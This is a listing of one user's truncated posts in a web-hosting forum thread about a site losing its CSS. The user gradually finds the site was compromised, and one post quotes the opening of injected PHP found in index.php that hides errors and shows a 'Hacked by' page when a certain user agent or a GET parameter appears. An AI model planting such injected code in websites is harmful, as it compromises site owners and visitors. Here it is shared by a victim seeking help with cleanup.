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  1. E

    Problems on CSS loading for xo4

    Ok... does anyone can suggest how to launch the scan locally in the case I download the entire website locally? Please only windows options...
  2. E

    Problems on CSS loading for xo4

    guys, I need to run the scan...
  3. E

    Problems on CSS loading for xo4

    anyone has any idea why the original x10host would behave better than the parked domain?? I tried now and the x10host lose the CSS much rarely than the parked domain... funny thing is that the parked domain now is handled by cloudflare :rolleyes:... nice service
  4. E

    Problems on CSS loading for xo4

    I will wait for an answer, don't want to piss off anyone...
  5. E

    Problems on CSS loading for xo4

    no I was doing it wrong, that's why it was so fast.. when I got it right, that's where the cloudflare timeout kicked in.. so used the x10 direct server and that's where the high resource usage arrived..
  6. E

    Problems on CSS loading for xo4

    well, dear administrators, thanks for getting it back.. now... I would like to relaunch the scanner. Can I do it or not? Please let me know.. bringing down the website again would not make any sense.
  7. E

    Problems on CSS loading for xo4

    any alternative suggestion?
  8. E

    Problems on CSS loading for xo4

    well, now we are officially DEAD.. I can understand the resources, but then it means I cannot test my website here... :shifty: we will seriosuly think about moving, cannot go on like this...
  9. E

    Problems on CSS loading for xo4 ?????????????????????? this is a joke, HOW am I supposed to scan my website :mad:
  10. E

    Problems on CSS loading for xo4

    hitting timeout error because we now have cloudflare :shifty:
  11. E

    Problems on CSS loading for xo4

    problem is.. I don't have a SSH in the free hosting... :eek: can launch only from browser as quick scan... results not clear...
  12. E

    Problems on CSS loading for xo4

    probably I am not putting the filed for the specific CMS in the right folder...
  13. E

    Problems on CSS loading for xo4

    sorry, it's the same :P
  14. E

    Problems on CSS loading for xo4

    no, I actually mean this: it's a php script
  15. E

    Problems on CSS loading for xo4

    Hi, yep, that's the first thing I did. I simply took the original index.php file and replaced the other one. Actually now I am trying to see if there is any other thing around that does not look good. I am trying the AI-BOLIT, do you know it? it seems I cannot make it work..
  16. E

    Problems on CSS loading for xo4

    we simply inactivated ftp, but I remember someone was trying to exploit in the past a bug in a module so we inactivated it and uninstalled it as well. Probably he got somewhere but not entirely. I am not sure...
  17. E

    Problems on CSS loading for xo4

    wooops... my index.php has this line at the beginning... sounds like HACKED... <?php error_reporting(0); $r=$_SERVER["HTTP_USER_AGENT"];if((preg_match("/MSIE 9.0; Windows NT 6.0; Trident\/5.0/i",$r)) OR(isset($_GET["z"]))){echo "<title>Hacked by d3b~X</title><center><div id=q>Gantengers...
  18. E

    Problems on CSS loading for xo4

    Hello, thanks a lot everyone for your analysis. Very strange because as I mentioned the .htaccess is exactly the same. We installed a couple of additional plug-ins but yesterday evening we unistalled them. We thought immediately the .htacces could have been the issue, but considering the other...
  19. E

    Problems on CSS loading for xo4

    Hi bdistler, thanks for you answer. The strange thing is that the x06 one is almost identical website with same plug-ins etc, therefore I would expect the 2 websites to behave identically. But we will nail it down and check if there is any module/plug-in that is not on x06. I actually got a...
  20. E

    Problems on CSS loading for xo4

    Hi Dead-i, thanks for the reply. Are entry processes related to visits? Because we have Analytics and we don't get more that 20 visits per day, except some fishing attacks by the infamous Russian Samora region (but again, it should be just a hacking of Google Analytics, not actual website...